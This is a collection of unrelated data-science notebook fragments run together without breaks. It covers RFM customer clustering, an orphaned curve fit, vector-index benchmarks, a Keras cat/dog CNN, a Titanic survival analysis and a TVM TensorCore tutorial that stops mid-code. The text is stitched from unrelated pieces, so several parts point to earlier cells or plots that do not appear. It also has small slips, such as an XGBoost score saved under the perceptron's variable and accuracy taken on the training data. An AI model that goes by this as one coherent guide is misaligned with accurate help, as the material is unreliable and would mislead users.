who have not been very recent, are much less frequent with their purchases and their monetary value is much lower than that of segment 1.# 3 - Cluster Approach from sklearn.cluster import KMeans kmeans = KMeans(n_clusters = 3, random_state = 1) kmeans.fit(datamart_normalized) cluster_labels = kmeans.labels_ datamart_rfm_k3 = datamart_rfm.assign(Cluster = cluster_labels) datamart_rfm_k3.groupby(['Cluster']).agg({ 'Recency':'mean', 'Frequency':'mean', 'Monetary Value' : ['mean', 'count'] }).round(0)Profile and Interpret Segments Approach to build customer personas Summary statistics for each cluster e.g. average RFM values* We have already seen the approach where we assign the cluster label to the original dataset and then calculate average values of each cluster. Note: We have already this above in cell 48 and 49, as we can see there are some inherant differences between 2-segment and 3-segment solutions, while the former is simpler, the 3-segment solution gives more insights. Snake Plots (from Market Research)* Another approach is to use snake plots - a chart that visualizes RFM values between the segments.* Market Research technique to compare different segments.* Visual Representation of each segment attributes.* Need to first normalize data(center and scale).* Plot each cluster's average normalized values of each attribute on a line plot. 
Relative importance of cluster attributes compared to population# Preparing data for snake plot # Transform datamart_normalized as DataFrame and add a Cluster column datamart_normalized = pd.DataFrame(datamart_normalized, index = datamart_rfm.index, columns = datamart_rfm.columns) datamart_normalized['Cluster'] = datamart_rfm_k3['Cluster'] # Melt the data into a long format so RFM values and metric names are stored in 1 column each datamart_melt = pd.melt(datamart_normalized.reset_index(), id_vars = ['CustomerID', 'Cluster'], value_vars = ['Recency','Frequency', 'Monetary Value'], var_name = 'Attribute', value_name = 'Value') # Visualize the snake plot plt.title('Snake Plot of Standardized Variables') sns.lineplot(x='Attribute', y = 'Value', hue = 'Cluster', data = datamart_melt)Relative Importance of Segment Attributes* Useful technique to identify relative importance of each segment's attribute* Calculate average values of each clustercluster_avg = datamart_rfm_k3.groupby(['Cluster']).mean() population_avg = datamart_rfm.mean() relative_imp = cluster_avg / population_avg - 1 # Understanding the relative_imp using a heatmap plt.figure(figsize=(8,2)) plt.title('Relative Importance of Attributes') sns.heatmap(data = relative_imp, annot = True, fmt = '.2f', cmap = 'RdYlGn') plt.show()Analysis of above results* The further a ratio from 0, the more important that attribute is for a segment relative to the total population *************************************************** Project **************************************************** Implementation Summary of end-to-end segmentation solution Key Steps* Gather Data - You will use an updated data that has recency, frequency and monetary values from the previous lessons and an additional variable to make this more interesting.* Pre-process data the data to ensure k-means clustering works as expected.* Explore the data and decide on the number of clusters* Run k-means clustering.* Analyze and Visualize results We will not be using an additional dataset, this is taken from a different CSV file 'datamart_rfmt.csv' which is loaded below. New Dataset: Tenure, which means time since first transaction. 
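The RFMT table is read from a prepared CSV in the next cell. As a hedged sketch of where such a Tenure column could come from (not how the provided file was actually built), it could be derived from a transaction-level frame like `data` above, using the same snapshot-date convention as Recency; `datamart_rfmt_sketch` below is a hypothetical name for illustration only.

```python
# Hypothetical sketch: deriving Tenure (days since first transaction) from a
# transaction frame like `data` above. The provided datamart_rfmt.csv is used
# as-is below; this only illustrates the definition of the new column.
from datetime import timedelta

snapshot_date = data["InvoiceDate"].max() + timedelta(days=1)
first_purchase = data.groupby("CustomerID")["InvoiceDate"].min()
tenure = (snapshot_date - first_purchase).dt.days       # days since first transaction
datamart_rfmt_sketch = datamart[["Recency", "Frequency", "Monetary Value"]].join(
    tenure.rename("Tenure")
)
```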
It ultimately defines how long the customer has been with the company, since their first transaction.datamart_rfmt = pd.read_csv('/Users/khushal/Desktop/CustomerSegmentation/CSP3/datamart_rfmt.csv') datamart_rfmt.head()First Step -- Pre-process the Data# Import StandardScaler from sklearn.preprocessing import StandardScaler # Apply log transformation datamart_rfmt_log = np.log(datamart_rfmt) # Initialize StandardScaler and fit it scaler = StandardScaler(); scaler.fit(datamart_rfmt_log) # Transform and store the scaled data as datamart_rfmt_normalized datamart_rfmt_normalized = scaler.transform(datamart_rfmt_log)Second Step: Calculate and plot sum of squared errors# Fit KMeans and calculate SSE for each k between 1 and 10 sse = {} # reset the SSE dictionary for this dataset for k in range(1, 11): # Initialize KMeans with k clusters and fit it kmeans = KMeans(n_clusters= k , random_state=1).fit(datamart_rfmt_normalized) # Assign sum of squared distances to k element of the sse dictionary sse[k] = kmeans.inertia_ # Add the plot title, x and y axis labels plt.title('The Elbow Method'); plt.xlabel('k'); plt.ylabel('SSE') # Plot SSE values for each k stored as keys in the dictionary sns.pointplot(x=list(sse.keys()), y=list(sse.values())) plt.show()Third Step: Since the elbow is at 4, build a 4-cluster solution# Import KMeans from sklearn.cluster import KMeans # Initialize KMeans kmeans = KMeans(n_clusters = 4, random_state = 1) # Fit k-means clustering on the normalized data set kmeans.fit(datamart_rfmt_normalized) # Extract cluster labels cluster_labels = kmeans.labels_Fourth Step: Analyze the Segments# Create a new DataFrame by adding a cluster label column to datamart_rfmt datamart_rfmt_k4 = datamart_rfmt.assign(Cluster= cluster_labels) # Group by cluster grouped = datamart_rfmt_k4.groupby(['Cluster']) # Calculate average RFMT values and segment sizes for each cluster grouped.agg({ 'Recency': 'mean', 'Frequency': 'mean', 'MonetaryValue': 'mean', 'Tenure': ['mean', 'count'] }).round(1)The above line fits quite well for the **middle part** of the scatter plot; however, notice the **beginning (n: 0 - 10k)** and the **ending (n: 40k - 50k)**: both sections appear to fall away from the predicted line. This suggests that the plot is not exactly a straight line (the number of pairs required to form 1 component is **not linearly proportional** to input size).# let's try to fit it with a linearithmic plot (n lg n) # pair_count_exp = np.copy(pair_count_arr) # tuning intercept and coefficient manually to fit the curve with scatter plot intercept = 950 coefficient = 0.065 pair_count_exp = coefficient * pair_count_arr * np.log2(pair_count_arr) + intercept # plotting the predicted scatter_plot(pair_count_exp)The model was saved with pickle after training finished; load it back here.autompg_lr = pickle.load(open('./saves/autompg_lr.pkl','rb')) autompg_lr type(autompg_lr) autompg_lr.predict([[3504.0,8]])Performance Tests%load_ext autoreload %autoreload 2 import time import matplotlib.pyplot as plt import numpy as np from interactive_index import InteractiveIndexLoad LVIS Embeddingsembeddings = np.load("lvis-embeddings.npy", allow_pickle=True).item() image_fnames = list(embeddings.keys()) res1024_embs = np.array([embeddings[img]['res4'] for img in image_fnames]).squeeze() res2048_embs = np.array([embeddings[img]['res5'] for img in image_fnames]).squeeze() assert res1024_embs.shape == (len(image_fnames), 1024) assert res2048_embs.shape == (len(image_fnames), 2048)Create Two IndexesWe're going to be creating these indexes a lot, so let's write a convenience function for it.def create_indexes(d0=1024,
d1=2048, n_centroids=512, vectors_per_index=len(image_fnames) // 8): index0 = InteractiveIndex( d=d0, n_centroids=n_centroids, vectors_per_index=vectors_per_index, tempdir='/tmp/idx0' ) index1 = InteractiveIndex( d=d1, n_centroids=n_centroids, vectors_per_index=vectors_per_index, tempdir='/tmp/idx1' ) return index0, index1Speedup vs. Accuracy Varying Number of Probesindex_1024, index_2048 = create_indexes()Train the indexesn_train = 20_000 start = time.time() index_1024.train(res1024_embs[:n_train]) end = time.time() print(f'Training index_1024 on {n_train} vectors for {index_1024.n_centroids} clusters took {end - start:.3} seconds') start = time.time() index_2048.train(res2048_embs[:n_train]) end = time.time() print(f'Training index_2048 on {n_train} vectors for {index_2048.n_centroids} clusters took {end - start:.3} seconds')Training index_1024 on 20000 vectors for 512 clusters took 0.945 seconds Training index_2048 on 20000 vectors for 512 clusters took 1.65 secondsAdd all vectorsTo be within the memory space of our gpu, let's add in batches of vectors_per_index.inc = 2 * index_1024.vectors_per_index for i in range(len(image_fnames) // inc): start = time.time() index_1024.add(res1024_embs[i * inc:(i + 1) * inc]) end = time.time() print(f'Adding {inc}, 1024-D vectors to index_1024 with {index_1024.n_centroids} clusters took {end - start:.3} seconds') for i in range(len(image_fnames) // inc): start = time.time() index_2048.add(res2048_embs[i * inc:(i + 1) * inc]) end = time.time() print(f'Adding {inc}, 2048-D vectors to index_2048 with {index_2048.n_centroids} clusters took {end - start:.3} seconds') # merge the partial indexes before searching start = time.time() index_1024.merge_partial_indexes() end = time.time() print(f'd=1024: Merging {index_1024.n_indexes} partial indexes with {index_1024.n_vectors} vectors took {end - start:.3} seconds') start = time.time() index_2048.merge_partial_indexes() end = time.time() print(f'd=2048: Merging {index_2048.n_indexes} partial indexes with {index_2048.n_vectors} vectors took {end - start:.3} seconds')d=1024: Merging 8 partial indexes with 163688 vectors took 0.367 seconds d=2048: Merging 8 partial indexes with 163688 vectors took 1.03 secondsGet Ground-Truth for AccuracySince all the vectors are stored in full for these indexes, we can get the precise nearest neighbors by setting `n_probes` to the number of clusters.# Pick 50 random embeddings n_xq = 50 xq_1024 = res1024_embs[np.random.choice(np.arange(res1024_embs.shape[0]), n_xq)] xq_2048 = res2048_embs[np.random.choice(np.arange(res2048_embs.shape[0]), n_xq)] # Get the 100 nearest neighbors k = 100 start = time.time() dists_1024, inds_1024 = index_1024.query(xq_1024, k=k, n_probes=index_1024.n_centroids) end = time.time() print(f'd=1024: Querying the {k} nearest neighbors of {n_xq} points across all centroids took {end - start:.3} seconds') start = time.time() dists_2048, inds_2048 = index_2048.query(xq_2048, k=k, n_probes=index_2048.n_centroids) end = time.time() print(f'd=2048: Querying the {k} nearest neighbors of {n_xq} points across all centroids took {end - start:.3} seconds') max_n_probes = index_1024.n_centroids times_1024 = np.empty(max_n_probes//4) avg_recall_pct_1024 = np.empty(max_n_probes//4) avg_dist_1024 = np.empty(max_n_probes//4) for n_probes in range(max_n_probes, 0, -4): start = time.time() dists, inds = index_1024.query(xq_1024, k=k, n_probes=n_probes) end = time.time() print(f'n_probes={n_probes}: {end-start:.3} seconds') times_1024[n_probes//4 - 1] = end - start 
avg_dist_1024[n_probes//4 - 1] = dists.mean() recall_pcts = 0 for i in range(len(inds)): recall_pcts += len(set(inds[i]) & set(inds_1024[i])) / k avg_recall_pct_1024[n_probes//4 - 1] = recall_pcts / len(inds) max_n_probes = index_2048.n_centroids times_2048 = np.empty(max_n_probes//4) avg_recall_pct_2048 = np.empty(max_n_probes//4) avg_dist_2048 = np.empty(max_n_probes//4) for n_probes in range(max_n_probes, 0, -4): start = time.time() dists, inds = index_2048.query(xq_2048, k=k, n_probes=n_probes) end = time.time() print(f'n_probes={n_probes}: {end-start:.3} seconds') times_2048[n_probes//4 - 1] = end - start avg_dist_2048[n_probes//4 - 1] = dists.mean() recall_pcts = 0 for i in range(len(inds)): recall_pcts += len(set(inds[i]) & set(inds_2048[i])) / k avg_recall_pct_2048[n_probes//4 - 1] = recall_pcts / len(inds) plt.plot((np.arange(len(times_1024)) + 1) * 4, times_1024[-1] / times_1024, label='1024-D') plt.plot((np.arange(len(times_2048)) + 1) * 4, times_2048[-1] / times_2048, label='2048-D') plt.legend() plt.ylabel('Speedup over full search') plt.xlabel('Number of probes') plt.title('Speedup vs. Number of Probes') plt.show() plt.plot(avg_recall_pct_1024, times_1024[-1] / times_1024, label='1024-D') plt.plot(avg_recall_pct_2048, times_2048[-1] / times_2048, label='2048-D') plt.legend() plt.ylabel('Speedup over full search') plt.xlabel('Average recall percentage') plt.title('Speedup vs. Average Recall Percentage') plt.show() plt.plot(np.sqrt(avg_dist_1024 / avg_dist_1024[-1]), times_1024[-1] / times_1024, label='1024-D') plt.plot(np.sqrt(avg_dist_2048 / avg_dist_2048[-1]), times_2048[-1] / times_2048, label='2048-D') plt.legend() plt.ylabel('Speedup over full search') plt.xlabel('Increase in average distance of results') plt.title('Speedup vs. Percentage Increase of Average Distance') plt.show() start = time.time() dists, inds = index_1024.query(xq_1024[0], k=100, n_probes=512) end = time.time() print(end-start)0.3320941925048828A CNN classifier for dogs and cats datasetThe problem is to classify a given image to dog or cat image. A simple convolutional neural network can be built with convolution layers, max pool layers and dense layers using Theano, Tensorflow and Keras frameworks. 
As of today, the architecture of CNN models have evolved to complex networks with lot of convolution layers, dense layers, pooling layers, dropout layers, combined together to achieve high accuracy and to solve complex image classification problems.from keras.models import Sequential from keras.layers import Conv2D from keras.layers import Flatten from keras.layers import Dense from keras.layers import MaxPooling2D imgclassifier = Sequential() imgclassifier.add(Conv2D(64, (3, 3), input_shape = (64, 64, 3), activation = 'relu')) imgclassifier.add(MaxPooling2D(pool_size = (2, 2))) imgclassifier.add(Conv2D(32, (3, 3), activation = 'relu')) imgclassifier.add(MaxPooling2D(pool_size = (2, 2))) imgclassifier.add(Conv2D(32, (3, 3), activation = 'relu')) imgclassifier.add(MaxPooling2D(pool_size = (2, 2))) imgclassifier.add(Flatten()) imgclassifier.add(Dense(units = 128, activation = 'relu')) imgclassifier.add(Dense(units = 64, activation = 'relu')) imgclassifier.add(Dense(units = 1, activation = 'sigmoid')) imgclassifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy']) from keras.preprocessing.image import ImageDataGenerator trainDataGenerator = ImageDataGenerator( rescale=1./255, shear_range=0.2, zoom_range=0.2, horizontal_flip=True) testDataGenerator = ImageDataGenerator(rescale=1./255)W0827 16:11:55.352031 139878987798336 deprecation_wrapper.py:119] From /home/chandru4ni/python-environments/qc/local/lib/python3.6/site-packages/keras/optimizers.py:790: The name tf.train.Optimizer is deprecated. Please use tf.compat.v1.train.Optimizer instead. W0827 16:11:55.403251 139878987798336 deprecation_wrapper.py:119] From /home/chandru4ni/python-environments/qc/local/lib/python3.6/site-packages/keras/backend/tensorflow_backend.py:3376: The name tf.log is deprecated. Please use tf.math.log instead. W0827 16:11:55.416798 139878987798336 deprecation.py:323] From /home/chandru4ni/python-environments/qc/local/lib/python3.6/site-packages/tensorflow/python/ops/nn_impl.py:180: add_dispatch_support..wrapper (from tensorflow.python.ops.array_ops) is deprecated and will be removed in a future version. 
Instructions for updating: Use tf.where in 2.0, which has the same broadcast rule as np.whereThe dataset of dogs and cats can be downloaded from https://www.kaggle.com/c/dogs-vs-cats/dataThe training data needs to be stored in trainingSet folder and test data in testSet foldertrainingSet = trainDataGenerator.flow_from_directory('trainingSet', target_size=(64, 64), batch_size=32, class_mode='binary') testSet = testDataGenerator.flow_from_directory('testSet', target_size=(64, 64), batch_size=32, class_mode='binary') imgclassifier.fit_generator(trainingSet, samples_per_epoch=8000, nb_epoch=5, validation_data=testSet, nb_val_samples=2000) import numpy as np from keras.preprocessing import image test_new_image = image.load_img('new_input.jpg', target_size=(64, 64)) test_new_image = image.img_to_array(test_new_image) test_new_image = np.expand_dims(test_new_image, axis = 0) result = imgclassifier.predict(test_new_image) trainingSet.class_indices if result[0][0] == 1: prediction = 'dog' else: prediction = 'cat' prediction![](http://i67.tinypic.com/2jcbwcw.png) Titanic Survival Analysis **Authors:** Several public Kaggle Kernels, edits by & Install xgboost package in your pyhton enviroment:try:```$ conda install py-xgboost```# You can also install the package by running the line below # directly in your notebook #!conda install py-xgboost --y # No warnings import warnings warnings.filterwarnings('ignore') # Filter out warnings # data analysis and wrangling import pandas as pd import numpy as np import random as rnd # visualization import seaborn as sns import matplotlib.pyplot as plt %matplotlib inline # machine learning from sklearn.linear_model import LogisticRegression from sklearn.svm import SVC, LinearSVC from sklearn.ensemble import RandomForestClassifier from sklearn.neighbors import KNeighborsClassifier from sklearn.naive_bayes import GaussianNB # Gaussian Naive Bays from sklearn.linear_model import Perceptron from sklearn.linear_model import SGDClassifier #stochastic gradient descent from sklearn.tree import DecisionTreeClassifier import xgboost as xgb # Plot styling sns.set(style='white', context='notebook', palette='deep') plt.rcParams[ 'figure.figsize' ] = 9 , 5 # Special distribution plot (will be used later) def plot_distribution( df , var , target , **kwargs ): row = kwargs.get( 'row' , None ) col = kwargs.get( 'col' , None ) facet = sns.FacetGrid( df , hue=target , aspect=4 , row = row , col = col ) facet.map( sns.kdeplot , var , shade= True ) facet.set( xlim=( 0 , df[ var ].max() ) ) facet.add_legend() plt.tight_layout()References to material we won't cover in detail:* **Gradient Boosting:** http://blog.kaggle.com/2017/01/23/a-kaggle-master-explains-gradient-boosting/* **Naive Bayes:** http://scikit-learn.org/stable/modules/naive_bayes.html* **Perceptron:** http://aass.oru.se/~lilien/ml/seminars/2007_02_01b-Janecek-Perceptron.pdf Input Datatrain_df = pd.read_csv('train.csv') test_df = pd.read_csv('test.csv') combine = [train_df, test_df] # when we change train_df or test_df the objects in combine will also change # (combine is only a pointer to the objects) # combine is used to ensure whatever preprocessing is done # on training data is also done on test dataAnalyze Data:print(train_df.columns.values) # seem to agree with the variable definitions above # preview the data train_df.head() train_df.describe()Comment on the Data`PassengerId` does not contain any valuable information. 
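A quick sketch to back up that claim (assuming `train_df` as loaded above): the column is just a unique row identifier, so it carries no signal about survival.

```python
# PassengerId is one-per-row and essentially uncorrelated with the target,
# which is why it is safe to drop it for modelling.
print(train_df["PassengerId"].is_unique)                     # True
print(train_df["PassengerId"].corr(train_df["Survived"]))    # close to 0
```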
`Survived, Passenger Class, Age Siblings Spouses, Parents Children` and `Fare` are numerical values -- so we don't need to transform them, but we might want to group them (i.e. create categorical variables). `Sex, Embarked` are categorical features that we need to map to integer values. `Name, Ticket` and `Cabin` might also contain valuable information. Preprocessing Data# check dimensions of the train and test datasets print("Shapes Before: (train) (test) = ", train_df.shape, test_df.shape) print() # Drop columns 'Ticket', 'Cabin', need to do it for both test and training train_df = train_df.drop(['Ticket', 'Cabin'], axis=1) test_df = test_df.drop(['Ticket', 'Cabin'], axis=1) combine = [train_df, test_df] print("Shapes After: (train) (test) =", train_df.shape, test_df.shape) # Check if there are null values in the datasets print(train_df.isnull().sum()) print() print(test_df.isnull().sum()) # from the Name column we will extract title of each passenger # and save that in a column in the datasets called 'Title' # if you want to match Titles or names with any other expression # refer to this tutorial on regex in python: # https://www.tutorialspoint.com/python/python_reg_expressions.htm for dataset in combine: dataset['Title'] = dataset.Name.str.extract(' ([A-Za-z]+)\.', expand=False) # We will check the count of different titles across the training and test dataset pd.crosstab(train_df['Title'], train_df['Sex']) # same for test pd.crosstab(test_df['Title'], test_df['Sex']) # We see common titles like Miss, Mrs, Mr,Master are dominant, we will # correct some Titles to standard forms and replace the rarest titles # with single name 'Rare' for dataset in combine: dataset['Title'] = dataset['Title'].replace(['Lady', 'Countess','Capt', 'Col',\ 'Don', 'Dr', 'Major', 'Rev', 'Sir', 'Jonkheer', 'Dona'], 'Rare') dataset['Title'] = dataset['Title'].replace('Mlle', 'Miss') #Mademoiselle dataset['Title'] = dataset['Title'].replace('Ms', 'Miss') dataset['Title'] = dataset['Title'].replace('Mme', 'Mrs') #Madame train_df[['Title', 'Survived']].groupby(['Title']).mean() # Survival chance for each title sns.countplot(x='Survived', hue="Title", data=train_df, order=[1,0]); # Map title string values to numbers so that we can make predictions title_mapping = {"Mr": 1, "Miss": 2, "Mrs": 3, "Master": 4, "Rare": 5} for dataset in combine: dataset['Title'] = dataset['Title'].map(title_mapping) dataset['Title'] = dataset['Title'].fillna(0) # Handle missing values train_df.head() # Drop the unnecessary Name column (we have the titles now) train_df = train_df.drop(['Name', 'PassengerId'], axis=1) test_df = test_df.drop(['Name'], axis=1) combine = [train_df, test_df] train_df.shape, test_df.shape # Map Sex to numerical categories for dataset in combine: dataset['Sex'] = dataset['Sex']. 
\ map( {'female': 1, 'male': 0} ).astype(int) train_df.head() # Guess values of age based on sex (row, male / female) # and socioeconomic class (1st,2nd,3rd) of the passenger guess_ages = np.zeros((2,3),dtype=int) #initialize guess_ages # Fill the NA's for the Age columns # with "qualified guesses" for idx,dataset in enumerate(combine): if idx==0: print('Working on Training Data set\n') else: print('-'*35) print('Working on Test Data set\n') print('Guess values of age based on sex and pclass of the passenger...') for i in range(0, 2): for j in range(0,3): guess_df = dataset[(dataset['Sex'] == i) &(dataset['Pclass'] == j+1)]['Age'].dropna() # Extract the median age for this group # (less sensitive) to outliers age_guess = guess_df.median() # Convert random age float to int guess_ages[i,j] = int(age_guess) print('Guess_Age table:\n',guess_ages) print ('\nAssigning age values to NAN age values in the dataset...') for i in range(0, 2): for j in range(0, 3): dataset.loc[ (dataset.Age.isnull()) & (dataset.Sex == i) & (dataset.Pclass == j+1),\ 'Age'] = guess_ages[i,j] dataset['Age'] = dataset['Age'].astype(int) print() print('Done!') train_df.head() train_df['AgeBand'] = pd.cut(train_df['Age'], 5) train_df[['AgeBand', 'Survived']].groupby(['AgeBand'], as_index=False).mean().sort_values(by='AgeBand', ascending=True) # Plot distributions of Age of passangers who survived or did not survive plot_distribution( train_df , var = 'Age' , target = 'Survived' , row = 'Sex' ) # Change Age column to # map Age ranges (AgeBands) to integer values of categorical type for dataset in combine: dataset.loc[ dataset['Age'] <= 16, 'Age'] = 0 dataset.loc[(dataset['Age'] > 16) & (dataset['Age'] <= 32), 'Age'] = 1 dataset.loc[(dataset['Age'] > 32) & (dataset['Age'] <= 48), 'Age'] = 2 dataset.loc[(dataset['Age'] > 48) & (dataset['Age'] <= 64), 'Age'] = 3 dataset.loc[ dataset['Age'] > 64, 'Age']=4 train_df.head() train_df = train_df.drop(['AgeBand'], axis=1) combine = [train_df, test_df] train_df.head() for dataset in combine: dataset['FamilySize'] = dataset['SibSp'] + dataset['Parch'] + 1 train_df[['FamilySize', 'Survived']].groupby(['FamilySize'], as_index=False).mean().sort_values(by='Survived', ascending=False) sns.countplot(x='Survived', hue="FamilySize", data=train_df, order=[1,0]) for dataset in combine: dataset['IsAlone'] = 0 dataset.loc[dataset['FamilySize'] == 1, 'IsAlone'] = 1 train_df[['IsAlone', 'Survived']].groupby(['IsAlone'], as_index=False).mean() train_df = train_df.drop(['Parch', 'SibSp', 'FamilySize'], axis=1) test_df = test_df.drop(['Parch', 'SibSp', 'FamilySize'], axis=1) combine = [train_df, test_df] train_df.head() # We can also create new geatures based on intuitive combinations for dataset in combine: dataset['Age*Class'] = dataset.Age * dataset.Pclass train_df.loc[:, ['Age*Class', 'Age', 'Pclass']].head(8) # To replace Nan value in 'Embarked', we will use the mode of ports in 'Embaraked' # This will give us the most frequent port the passengers embarked from freq_port = train_df.Embarked.dropna().mode()[0] freq_port # Fill NaN 'Embarked' Values in the datasets for dataset in combine: dataset['Embarked'] = dataset['Embarked'].fillna(freq_port) train_df[['Embarked', 'Survived']].groupby(['Embarked'], as_index=False).mean().sort_values(by='Survived', ascending=False) sns.countplot(x='Survived', hue="Embarked", data=train_df, order=[1,0]); # Map 'Embarked' values to integer values for dataset in combine: dataset['Embarked'] = dataset['Embarked'].map( {'S': 0, 'C': 1, 'Q': 2} ).astype(int) 
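```python
# (Added sanity-check sketch, not part of the original notebook.) If the cells
# above ran in order, Title, Sex, Age and Embarked should now all be integer
# codes with no missing values in both the train and test frames:
for dataset in combine:
    assert dataset[["Title", "Sex", "Age", "Embarked"]].isnull().sum().sum() == 0
    assert dataset["Embarked"].isin([0, 1, 2]).all()
```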
train_df.head() # Fill the NA values in the Fares column with the median test_df['Fare'].fillna(test_df['Fare'].dropna().median(), inplace=True) test_df.head() # q cut will find ranges equal to the quartile of the data train_df['FareBand'] = pd.qcut(train_df['Fare'], 4) train_df[['FareBand', 'Survived']].groupby(['FareBand'], as_index=False).mean().sort_values(by='FareBand', ascending=True) for dataset in combine: dataset.loc[ dataset['Fare'] <= 7.91, 'Fare'] = 0 dataset.loc[(dataset['Fare'] > 7.91) & (dataset['Fare'] <= 14.454), 'Fare'] = 1 dataset.loc[(dataset['Fare'] > 14.454) & (dataset['Fare'] <= 31), 'Fare'] = 2 dataset.loc[ dataset['Fare'] > 31, 'Fare'] = 3 dataset['Fare'] = dataset['Fare'].astype(int) train_df = train_df.drop(['FareBand'], axis=1) combine = [train_df, test_df] train_df.head(7) # All features are approximately on the same scale # no need for feature engineering / normalization test_df.head(7) # Check correlation between features # (uncorrelated features are generally more powerful predictors) colormap = plt.cm.viridis plt.figure(figsize=(10,10)) plt.title('Pearson Correlation of Features', y=1.05, size=15) sns.heatmap(train_df.astype(float).corr().round(2)\ ,linewidths=0.1,vmax=1.0, square=True, cmap=colormap, linecolor='white', annot=True)Your Task: Model, Predict, and ChooseTry using different classifiers to model and predict. Choose the best model from:* Logistic Regression* KNN * SVM* Naive Bayes Classifier* Decision Tree* Random Forest* Perceptron* XGBoost.ClassifierX_train = train_df.drop("Survived", axis=1) Y_train = train_df["Survived"] X_test = test_df.drop("PassengerId", axis=1).copy() X_train.shape, Y_train.shape, X_test.shape # Logistic Regression logreg = LogisticRegression() logreg.fit(X_train, Y_train) Y_pred = logreg.predict(X_test) acc_log = round(logreg.score(X_train, Y_train) * 100, 2) acc_log # Support Vector Machines svc = SVC() svc.fit(X_train, Y_train) Y_pred = svc.predict(X_test) acc_svc = round(svc.score(X_train, Y_train) * 100, 2) acc_svc knn = KNeighborsClassifier(n_neighbors = 3) knn.fit(X_train, Y_train) Y_pred = knn.predict(X_test) acc_knn = round(knn.score(X_train, Y_train) * 100, 2) acc_knn # Perceptron perceptron = Perceptron() perceptron.fit(X_train, Y_train) Y_pred = perceptron.predict(X_test) acc_perceptron = round(perceptron.score(X_train, Y_train) * 100, 2) acc_perceptron # XGBoost gradboost = xgb.XGBClassifier(n_estimators=1000) gradboost.fit(X_train, Y_train) Y_pred = gradboost.predict(X_test) acc_perceptron = round(gradboost.score(X_train, Y_train) * 100, 2) acc_perceptron # Random Forest random_forest = RandomForestClassifier(n_estimators=1000) random_forest.fit(X_train, Y_train) Y_pred = random_forest.predict(X_test) random_forest.score(X_train, Y_train) acc_random_forest = round(random_forest.score(X_train, Y_train) * 100, 2) acc_random_forest # Look at importnace of features for random forest def plot_model_var_imp( model , X , y ): imp = pd.DataFrame( model.feature_importances_ , columns = [ 'Importance' ] , index = X.columns ) imp = imp.sort_values( [ 'Importance' ] , ascending = True ) imp[ : 10 ].plot( kind = 'barh' ) print (model.score( X , y )) plot_model_var_imp(random_forest, X_train, Y_train) # How to create a Kaggle submission: submission = pd.DataFrame({ "PassengerId": test_df["PassengerId"], "Survived": Y_pred }) submission.to_csv('titanic.csv', index=False)How to optimize convolution using TensorCores=============================================**Author**: ` `_In this tutorial, we will demonstrate how to 
write a high performance convolutionschedule using TensorCores in TVM. In this example, we assume the input toconvolution has a large batch. We strongly recommend covering the `opt-conv-gpu` tutorial first. TensorCore Introduction-----------------------Each Tensor Core provides a 4x4x4 matrix processing array that operates:code:`D = A * B + C`, where A, B, C and D are 4x4 matrices as Figure shows.The matrix multiplication inputs A and B are FP16 matrices, while the accumulationmatrices C and D may be FP16 or FP32 matrices.However, CUDA programmers can only use warp-level primitive:code:`wmma::mma_sync(acc_frag, a_frag, b_frag, acc_frag)` to perform16x16x16 half-precision matrix multiplication on tensor cores. Before invokingthe matrix multiplication, programmers must load data from memory into registerswith primitive :code:`wmma::load_matrix_sync`, explicitly. The NVCC compiler translatesthat primitive into multiple memory load instructions. At run time, every thread loads16 elements from matrix A and 16 elements from B. Preparation and Algorithm-------------------------We use the fixed size for input tensors with 256 channels and 14 x 14 dimensions.The batch size is 256. Convolution filters contain 512 filters of size 3 x 3.We use stride size 1 and padding size 1 for the convolution. In the example, we useNHWCnc memory layout.The following code defines the convolution algorithm in TVM.import tvm from tvm import te import numpy as np from tvm.contrib import nvcc # The sizes of inputs and filters batch_size = 256 height = 14 width = 14 in_channels = 256 out_channels = 512 kernel_h = 3 kernel_w = 3 pad_h = 1 pad_w = 1 stride_h = 1 stride_w = 1 # TensorCore shape block_size = 16 assert batch_size % block_size == 0 assert in_channels % block_size == 0 assert out_channels % block_size == 0 # Input feature map: (N, H, W, IC, n, ic) data_shape = ( batch_size // block_size, height, width, in_channels // block_size, block_size, block_size, ) # Kernel: (H, W, IC, OC, ic, oc) kernel_shape = ( kernel_h, kernel_w, in_channels // block_size, out_channels // block_size, block_size, block_size, ) # Output feature map: (N, H, W, OC, n, oc) output_shape = ( batch_size // block_size, height, width, out_channels // block_size, block_size, block_size, ) # Reduction axes kh = te.reduce_axis((0, kernel_h), name="kh") kw = te.reduce_axis((0, kernel_w), name="kw") ic = te.reduce_axis((0, in_channels // block_size), name="ic") ii = te.reduce_axis((0, block_size), name="ii") # Algorithm A = te.placeholder(data_shape, name="A", dtype="float16") W = te.placeholder(kernel_shape, name="W", dtype="float16") Apad = te.compute( ( batch_size // block_size, height + 2 * pad_h, width + 2 * pad_w, in_channels // block_size, block_size, block_size, ), lambda n, h, w, i, nn, ii: tvm.tir.if_then_else( tvm.tir.all(h >= pad_h, h - pad_h < height, w >= pad_w, w - pad_w < width), A[n, h - pad_h, w - pad_w, i, nn, ii], tvm.tir.const(0.0, "float16"), ), name="Apad", ) Conv = te.compute( output_shape, lambda n, h, w, o, nn, oo: te.sum( Apad[n, h * stride_h + kh, w * stride_w + kw, ic, nn, ii].astype("float32") * W[kh, kw, ic, o, ii, oo].astype("float32"), axis=[ic, kh, kw, ii], ), name="Conv", ) s = te.create_schedule(Conv.op) s[Apad].compute_inline()Memory Scope------------In traditional GPU schedule, we have global, shared and local memory scope.To support TensorCores, we add another three special memory scope: :code:`wmma.matrix_a`,:code:`wmma.matrix_b` and :code:`wmma.accumulator`. 
On hardware, all fragments scopestores at the on-chip registers level, the same place with local memory.# Designate the memory hierarchy AS = s.cache_read(Apad, "shared", [Conv]) WS = s.cache_read(W, "shared", [Conv]) AF = s.cache_read(AS, "wmma.matrix_a", [Conv]) WF = s.cache_read(WS, "wmma.matrix_b", [Conv]) ConvF = s.cache_write(Conv, "wmma.accumulator")Define Tensor Intrinsic-----------------------In fact, TensorCore is a special hardware operation. So, we can just use tensorizeto replace a unit of computation with the TensorCore instruction. The first thing isthat we need to define tensor intrinsic.There are four basic operation in TensorCore: :code:`fill_fragment`, :code:`load_matrix`,:code:`mma_sync` and :code:`store_matrix`. Since :code:`fill_fragment` and :code:`mma_sync`are both used in matrix multiplication, so we can just write following three intrinsics.def intrin_wmma_load_matrix(scope): n = 16 A = te.placeholder((n, n), name="A", dtype="float16") BA = tvm.tir.decl_buffer(A.shape, A.dtype, scope="shared", data_alignment=32, offset_factor=256) C = te.compute((n, n), lambda i, j: A[i, j], name="C") BC = tvm.tir.decl_buffer(C.shape, C.dtype, scope=scope, 